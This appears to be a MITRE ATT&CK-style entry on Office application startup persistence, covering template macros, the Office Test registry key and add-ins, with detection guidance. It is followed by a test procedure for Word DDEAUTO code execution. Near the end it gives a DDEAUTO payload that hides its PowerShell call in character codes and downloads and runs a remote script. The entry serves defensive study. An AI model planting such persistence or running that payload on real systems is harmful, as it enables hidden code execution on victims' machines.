Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started.===Office Template Macros===
Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can inserted into the base templated and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded. (Citation: enigma0x3 normal.dotm) (Citation: Hexacorn Office Template Macros)
Word Normal.dotm location:
C:\Users(username)\AppData\Roaming\Microsoft\Templates\Normal.dotmExcel Personal.xlsb location:
C:\Users(username)\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSBAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.
===Office Test===
A Registry location was found that when a DLL reference was placed within it the corresponding DLL pointed to by the binary path would be executed every time an Office application is started (Citation: Hexacorn Office Test)
HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf===Add-ins===
Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins)
Add-ins can also be used to obtain persistence because they can be set to execute code when an Office application starts. There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), and Visual Studio Tools for Office (VSTO) add-ins. (Citation: MRWLabs Office Persistence Add-ins)
Detection: Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Modification to base templated, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins. (Citation: MRWLabs Office Persistence Add-ins)
Non-standard process execution trees may also indicate suspicious or malicious behavior. Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
Platforms: Windows
Data Sources: Process monitoring, Process command-line parameters, Windows Registry, File monitoring
Permissions Required: User, Administrator
System Requirements: Office Test technique: Office 2007, 2010, 2013, 2015 and 2016 Add-ins: some require administrator permissions
Contributors: Ricardo Dias, Loic Jaquemet
TrustedSec - Unicorn - https://github.com/trustedsec/unicorn
SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
Word VBA Macro
Supported Platforms: Windows
-
Open Word
-
Insert tab -> Quick Parts -> Field
-
Choose = (Formula) and click ok.
-
Once the field is inserted, you should now see "!Unexpected End of Formula"
-
Right-click the Field, choose "Toggle Field Codes"
-
Paste in the code from Unicorn or SensePost
-
Save the Word document.
-
DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"
-
DDEAUTO "C:\Programs\Microsoft\Office\MSWord\..\..\..\..\windows\system32\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\v1.0\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http:///download.ps1'); # " "Microsoft Document Security Add-On"